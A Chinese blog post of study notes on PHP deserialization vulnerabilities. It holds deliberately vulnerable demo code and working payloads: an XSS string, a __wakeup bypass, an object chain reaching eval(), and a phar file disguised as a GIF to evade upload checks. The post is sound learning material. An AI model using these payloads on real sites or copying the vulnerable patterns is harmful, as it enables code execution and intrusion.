PHP反序列化学习笔记

最新推荐文章于 2024-05-20 17:29:49 发布
最新推荐文章于 2024-05-20 17:29:49 发布
阅读量971 收藏 2
点赞数 3
分类专栏: 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43872099/article/details/105588576
版权

0x00 前言

php程序为了保存和转储对象,提供了序列化的方法,php序列化是为了在程序运行的过程中对对象进行转储而产生的。序列化可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。

php序列化的函数为serialize。反序列化的函数为unserialize

0x01 序列化与反序列化

序列化

利用serialize()函数将一个对象转换为字符串形式

<?php
	class test
	{
		public $name = "0xdawn";
		public $age = "20";
	}
	$a = new test();
	$a = serialize($a);
	print_r($a);
?>

得到的结果为:

O:4:"test":2:{s:4:"name";s:6:"0xdawn";s:3:"age";s:2:"20";}
pravite和protected成员的序列化
<?php
	class test
	{
		public $name = "0xdawn";
		private $age = "20";
		protected $sex = "man";
	}
	$a = new test();
	$a = serialize($a);
	print_r($a);
?>

得到的结果为:

O:4:"test":3:{s:4:"name";s:6:"0xdawn";s:9:"testage";s:2:"20";s:6:"*sex";s:3:"man";}

private

private属性序列化的时候格式是%00类名%00成员名,所以结果为s:9:"%00test%00age"

protected

protected属性序列化的时候格式是%00*%00成员名,所以结果为s:6:"%00*%00sex"

反序列化
<?php
	class test
	{
		public $name = "0xdawn";
		private $age = "20";
		protected $sex = "man";
	}
	$a = new test();
	$a = serialize($a);
	print_r($a);
	$a = unserialize($a);
	print_r($a);
?>

注意:publicprivateprotected变量在反序列化的时候是有区别的

魔术方法
__construct():当一个对象创建时被调用
__destruct():当一个对象销毁时被调用
__toString():当类被当成字符串时调用
__sleep():执行serialize时,会先调用这个函数
__wakeup():执行unserialize,会先调用这个函数
__call():在对象中调用一个不可访问方法时调用
__callStatic():用静态方式中调用一个不可访问方法时调用
__get():获得一个类的成员变量时调用
__set():设置一个类的成员变量时调用
__isset():当对不可访问属性调用isset()或empty()时调用
__unset():当对不可访问属性调用unset()时被调用
__invoke():调用函数的方式调用一个对象时的回应方法
__set_state():调用var_export()导出类时,此静态方法会被调用
__clone():当对象复制完成时调用
__autoload():尝试加载未定义的类
__debugInfo():打印所需调试信息

<?php
    class test{
        public $a='hacked by 0xdawn';
        public $b='hacked by admin';
        public function pt(){
            echo $this->a.'<br />';
        }
        public function __construct(){
            echo '__construct<br />';
        }
        public function __destruct(){
            echo '__destruct<br />';
        }
        public function __sleep(){
            echo '__sleep<br />';
            return array('a','b');
        }
        public function __wakeup(){
            echo '__wakeup<br />';
        }
    }
    //创建对象调用__construct
    $object = new test();
    //序列化对象调用__sleep
    $serialize = serialize($object);
    //输出序列化后的字符串
    echo 'serialize: '.$serialize.'<br />';
    //反序列化对象调用__wakeup
    $unserialize=unserialize($serialize);
    //调用pt输出数据
    $unserialize->pt();
    //脚本结束调用__destruct
?>

输出结果如下:

__construct
__sleep
serialize: O:4:"test":2:{s:1:"a";s:16:"hacked by 0xdawn";s:1:"b";s:15:"hacked by admin";}
__wakeup
hacked by 0xdawn
__destruct
__destruct

0x02 php反序列化

Demo1:基础漏洞
<?php
	class A
	{
		public $test = "demo";
		function __destruct()
		{
			echo $this->test;
		}
	}
	$a = $_GET['value'];
	$a_unser = unserialize($a);
?>

利用这个反序列化代码,将需要使用的代码序列化后传入

<?php
	class A
	{
		public $test = "hacked by 0xdawn";
	}
	$a = new A();
	$a = serialize($a);
	print_r($a);
?>
//O:1:"A":1:{s:4:"test";s:16:"hacked by 0xdawn";}

在这里插入图片描述

也可以拿来xss

http://127.0.0.1/Myphp/demo1.php?value=O:1:"A":1:{s:4:"test";s:42:"<script>alert('hacked by 0xdawn')</script>";}

在这里插入图片描述

Demo2:反序列化传参
<?php
error_reporting(0);
include "flag.php";
$KEY = "D0g3!!!";
$str = $_GET['str'];
if (unserialize($str) === "$KEY")
{
    echo "$flag";
}
show_source(__FILE__);

payload:

<?php
	$a = "D0g3!!!";
	$a = serialize($a);
	echo $a;
?>
//s:7:"D0g3!!!";

在这里插入图片描述

Demo3:绕过wakeup

unserialize()会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup() 方法

反序列化时,如果表示对象属性个数的值大于真实的属性个数时就会跳过__wakeup()的执行

<?php

class xctf
{
    public $flag = '111';
    public function __wakeup()
    {
        exit('bad requests');
    }
}

$a = new xctf();
print(serialize($a))

?>
//O:4:"xctf":1:{s:4:"flag";s:3:"111";}
//O:4:"xctf":2:{s:4:"flag";s:3:"111";}
Demo4:同名方法
<?php
    class A{
        public $target;
        function __construct(){
            $this->target = new B;
        }
        function __destruct(){
            $this->target->action();
        }
    }
    class B{
        function action(){
            echo "action B";
        }
    }
    class C{
        public $test;
        function action(){
            echo "action A";
            eval($this->test);
        }
    }
    unserialize($_GET['test']);
?>

class Bclass C有一个同名方法action,我们可以构造目标对象,使得析构函数调用class Caction方法,实现任意代码执行。利用代码如下:

<?php
    class A{
        public $target;
        function __construct(){
            $this->target = new C;
            $this->target->test = "phpinfo();";
        }
        function __destruct(){
            $this->target->action();
        }
    }
    class C{
        public $test;
        function action(){
            echo "action C";
            eval($this->test);
        }
    }
    echo serialize(new A);
?>
//O:1:%22A%22:1:{s:6:%22target%22;O:1:%22C%22:1:{s:4:%22test%22;s:10:%22phpinfo();%22;}}

http://127.0.0.1/Myphp/Demo4.php?test=O:1:%22A%22:1:{s:6:%22target%22;O:1:%22C%22:1:{s:4:%22test%22;s:10:%22phpinfo();%22;}}

0x03 phar反序列化

首推Hu3sky学长的初探phar://

phar文件简介

phar是一个合成词,由PHPArchive构成,可以看出它是php归档文件的意思(简单来说phar就是php压缩文档,不经过解压就能被 php 访问并执行)

phar的本质是一种压缩文件,其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data,这是上述攻击手法最核心的地方。

phar文件结构

  • stub

    phar文件的标志,必须以 xxx __HALT_COMPILER();?> 结尾,否则无法识别。xxx可以为自定义内容

  • manifest

    phar文件本质上是一种压缩文件,其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data,这是漏洞利用最核心的地方

  • content

    被压缩文件的内容

  • signature

    签名,放在末尾

这里有两个关键点,一是文件标识,必须以__HALT_COMPILER();?>结尾,但前面的内容没有限制,也就是说我们可以轻易伪造一个图片文件或者其它文件来绕过一些上传限制;二是反序列化,phar存储的meta-data信息以序列化方式存储,当文件操作函数通过phar://伪协议解析phar文件时就会将数据反序列化,而这样的文件操作函数有很多

生成phar文件

php内置了一个phar类来处理相关操作

注意:这里要将php.ini里面的phar.readonly选项设置为Off,并把分号去掉

<?php
    class TestObject {
    }
    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
    $o = new TestObject();
    $o -> data='0xdawn';
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
?>

访问后,会在当前目录下生成一个phar.phar文件

用winhex打开

在这里插入图片描述

可以看到meta-data是以序列化的形式存储的,有序列化数据必有反序列化操作。php一大部分的文件系统函数在通过phar://伪协议解析phar文件时,都会将meta-data进行反序列化,受影响的函数如下:

在这里插入图片描述

phar_fan.php

<?php
class TestObject{
    function __destruct()
    {
        echo $this -> data;   // TODO: Implement __destruct() method.
    }
}
include('phar://phar.phar');
?>

输出:0xdawn

在这里插入图片描述

将phar伪造成其他格式的文件

在前面分析phar的文件结构时可能会注意到,php识别phar文件是通过其文件头的stub,更确切一点来说是__HALT_COMPILER();?>这段代码,对前面的内容或者后缀名是没有要求的。那么我们就可以通过添加任意的文件头+修改后缀名的方式将phar文件伪装成其他格式的文件

<?php
    class TestObject {
    }

    @unlink("phar.phar");
    $phar = new Phar("phar.phar");
    $phar->startBuffering();
    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub,增加gif文件头
    $o = new TestObject();
    $phar->setMetadata($o); //将自定义meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
?>

采用这种方法可以绕过很大一部分上传检测

利用条件
  • phar文件需要上传到服务器端
  • 要有可用的魔术方法作为跳板
  • 文件操作函数的参数可控,且’:’、’/’、'phar’等特殊字符没有被过滤

0x04 session反序列化

参考这篇PHP中SESSION反序列化机制

php.ini配置

php.ini中有如下六个相对重要的配置

session.save_path=""      --设置session的存储位置
session.save_handler=""   --设定用户自定义存储函数,如果想使用PHP内置session存储机制之外的可以使用这个函数
session.auto_start        --指定会话模块是否在请求开始时启动一个会话,默认值为 0,不启动
session.serialize_handler --定义用来序列化/反序列化的处理器名字,默认使用php  
session.upload_progress.enabled --启用上传进度跟踪,并填充$ _SESSION变量,默认启用
session.upload_progress.cleanup --读取所有POST数据(即完成上传)后,立即清理进度信息,默认启用

phpstudy下上述配置如下:

session.save_path = "/tmp"      --所有session文件存储在/tmp目录下
session.save_handler = files    --表明session是以文件的方式来进行存储的
session.auto_start = 0          --表明默认不启动session
session.serialize_handler = php --表明session的默认(反)序列化引擎使用的是php(反)序列化引擎
session.upload_progress.enabled on --表明允许上传进度跟踪,并填充$ _SESSION变量
session.upload_progress.cleanup on --表明所有POST数据(即完成上传)后,立即清理进度信息($ _SESSION变量)

在上述配置中,session.serialize_handler是用来设置session的序列话引擎的,除了默认的PHP引擎之外,还存在其他引擎,不同的引擎所对应的session的存储方式不相同。

  • php_binary:存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值
  • php:存储方式是,键名+竖线+经过serialize()函数序列处理的值
  • php_serialize(php>5.5.4):存储方式是,经过serialize()函数序列化处理的值

在PHP中默认使用的是PHP引擎,如果要修改为其他的引擎,只需要添加代码ini_set('session.serialize_handler', '需要设置的引擎');。示例代码如下:

<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
// do something
session存储机制

php中的session中的内容并不是放在内存中的,而是以文件的方式来存储的,存储方式就是由配置项session.save_handler来进行确定的,默认是以文件的方式存储。 存储的文件是以sess_sessionid来进行命名的,文件的内容就是session值的序列化之后的内容。

php处理器

<?php
error_reporting(0);
ini_set('session.serialize_handler','php');
session_start();
$_SESSION['session'] = $_GET['session'];
?>

php_binary处理器

<?php
error_reporting(0);
ini_set('session.serialize_handler','php_binary');
session_start();
$_SESSION['sessionsessionsessionsessionsession'] = $_GET['session'];
?>

php_serialize处理器

<?php
error_reporting(0);
ini_set('session.serialize_handler','php_serialize');
session_start();
$_SESSION['session'] = $_GET['session'];
?>
session反序列化漏洞利用

人有点懵,参考链接:https://xz.aliyun.com/t/6753#toc-11

0x05 反序列化pop链构造

0xdawn
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
------已搬运-------关于GET方式传入PHP反序列化的字符串时private和protected的注意点
Zero_Adam的博客
01-25 670
关于GET方式传入PHP反序列化的字符串的注意点 注意private属性protected属性的,不一样哦 在传入private属性的时候,应该是s:14:"%00Name%00username"会在属性名前加上类名,并且类名左右有%00。 protected属性也是应该是s:5:"%00*%00bb"会在属性名前面加上*,而且*两边有%00 。 所以真要GET传参的时候应该是:O:4:"Name":4:{s:14:"%00Name%00username";s:6:"nonono";s:14:"%00
protected反序列化特点
qq_48511129的博客
12-13 1054
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hel
php反序列化原理
最新发布
byll1024的博客
05-20 1010
PHP反序列化是将经过序列化的字符串恢复成原始数据结构的过程。序列化是指将复杂数据结构(如数组、对象)转换为可存储或传输的字符串形式,而反序列化则是将这些字符串重新转换回原来的数据结构。在PHP中,这通常通过`unserialize()`函数实现。这个函数读取序列化字符串,并根据其中包含的信息重建原始的数据结构。需要注意的是,反序列化过程可能会执行字符串中包含的代码,因此存在安全风险。为了避免潜在的安全隐患,建议只对可信的序列化字符串进行反序列化操作。
PHP反序列化
qq_63267612的博客
02-28 1254
php序列化的过程就是把数据转化成一种可逆的数据结构,逆向的过程就叫做反序列化php将数据序列化反序列化会用到两个函数:serialize 将对象格式化成有序的字符串。unserialize 经字符串还原成原来的对象。序列化的目的是方便数据的传输和储存。a:3:{i:0;s:4:"anan";i:1;s:3:"shi";i:2;s:2:"zi";a:array代表是数组,后面的3说明有三个属性i:代表是整型数据int,后面的0是数组下标。
AreUSerialz-[网鼎杯 2020 青龙组]-[传送门->BUUCTF]
qwsn
11-23 1653
0x01、Web 1.AreUSerialz-[网鼎杯 2020 青龙组]-[传送门->BUUCTF] 第一步:打开题目环境,进行代码审计 <?php include("flag.php"); //文件包含flag.php highlight_file(__FILE__); //高亮显示当前页面源码 class FileHandler { //类:FileHandler protected $op; //保护属性:$op protected $
PHP序列化反序列化
dydydt的博客
07-11 905
序列化反序列化
PHP学习笔记
05-07
6. **与类有关的函数**(与类有关的函数.doc):这部分详细介绍了与类和对象相关的PHP内置函数,如构造函数、析构函数、克隆、序列化反序列化等。 7. **模板引擎_Smarty**(模板引擎_smarty.doc):Smarty是PHP的...
Symfony2学习笔记之控制器用法详解
12-18
回复对象(Response)可以是一个HTML页面,一个XML文档,一个序列化的JSON数组,一个图片,一个重定向,一个404错误或者任何你想要的内容。controller中可以包含任何渲染你页面内容的所需要的逻辑。 下面是一个...
Web安全学习笔记.pdf
10-22
在语言与框架部分,笔记讨论了PHP、Python、Java、JavaScript和Golang等常用编程语言的安全问题,如PHP的后门、反序列化漏洞,Python的格式化字符串攻击,Java的反序列化和RMI/JNDI攻击,JavaScript的沙箱逃逸,以及...
Hessian学习笔记
03-24
1. **二进制序列化**:Hessian使用高效的二进制格式进行序列化反序列化,与基于文本的序列化协议(如JSON或XML)相比,它能显著减少网络传输的数据量。二进制序列化的优势在于数据紧凑,解析速度快,但同时也降低...
JSON学习笔记
03-17
通过阅读这篇"JSON学习笔记",读者不仅可以了解JSON的基本概念,还能深入到实际开发中JSON的使用,包括解析、序列化、验证以及与HTTP、其他语言的交互等。同时,笔记可能会介绍如何利用提供的开源库来简化JSON处理的...
2022/3/28 PHP反序列化
weixin_44532761的博客
03-28 3466
小迪 https://www.bilibili.com/video/BV1JZ4y1c7ro?p=36&spm_id_from=333.880.my_history.page.click PHP反序列化 未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历登不可控后果。在反序列化的过程中自动触发了某些魔术方法。 serialize() //将一个对象转换成一个字符串 unserialize() //将字符串还原成一个对象 无类的情况
PHP serialize() 序列化函数
01-25 150
PHP serialize() 序列化函数 定义和用法 — 语法 string serialize ( mixed $value ) serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。 这有利于存储或传递 PHP 的值,同时不丢失其类型和结构。 想要将已序列化的字符串变回 PHP 的...
private反序列化特点
qq_48511129的博客
12-13 992
<?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $username; $this->password = $pa
[极客大挑战 2019]PHP反序列化漏洞中存在private变量)
weixin_45844670的博客
10-06 2424
根据题目提示“我经常备份”,推测可能是网站备份在某个路径下 使用dirmap扫描得到 下载得到一个压缩包,里面是网站的源码 里面的flag是假的 我们分析index.php和class.php index.php里面的php代码 <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> 这里是引用了class.php文件,用get方法传入一个sel
序列化反序列化
熊猫拿铁
12-01 94
序列化反序列化 概念: 序列化: 将程序中的对象,以二进制形式写入文件; 对象序列化流:ObjectOutputStream 反序列化: 将文件中的二进制数据,读回程序,重构成对象; 对象反序列化流:ObjectInputStream 注意:需要被序列化的对象的类,必须实现Serializ//反序列化 private void read() throws Except...
序列化反序列化
夜晓星的博客
01-31 138
实体 public class User implements Serializable{          private String id;     private String name;               public String getId() {         return id;     }     public void setId(String id) {  ...
php反序列化漏洞入门知识
凝聚力安全团队
01-25 517
目录 什么是php序列化? serialize()实例 数组序列化实例 对象序列化实例​ unserialize()实例 数组序列化实例 对象序列化实例 序列化字符串格式解析 变量类型 public、private、protected序列化后的区别 魔术方法 常见的魔术方法 方法调用实例 __sleep() __wakeup() __toString() 反序列化漏洞原理 参考链接
长亭php反序列化防护_PHP反序列化笔记
06-01
好的,您的问题是关于长亭PHP反序列化防护和PHP反序列化笔记。 首先,PHP反序列化是指将序列化的数据转换回PHP对象或数组的过程。这个过程在应用程序中非常常见,但也很容易被黑客利用来执行恶意代码。因此,PHP反序列化漏洞是一个常见的安全问题。 为了应对这个问题,一些安全公司和开发者提供了一些防护措施,例如长亭安全团队的PHP反序列化防护工具。该工具使用了一些技巧,例如对反序列化对象进行检查、限制反序列化的深度和长度、限制反序列化的类和属性等等。 此外,为了更好地理解PHP反序列化和如何防护它,以下是一些笔记: 1. PHP序列化反序列化函数是serialize()和unserialize()。 2. 序列化的数据是一个字符串,可以存储在文件中或通过网络传输。 3. 反序列化需要传入序列化的字符串,并将其转换为PHP对象或数组。 4. 反序列化时需要注意的是,反序列化的数据可能包含恶意代码,因此必须进行检查和过滤。 5. 可以通过限制反序列化的深度和长度、限制反序列化的类和属性等方式来防止反序列化漏洞。 希望这些笔记可以帮助您更好地理解PHP反序列化和防护措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值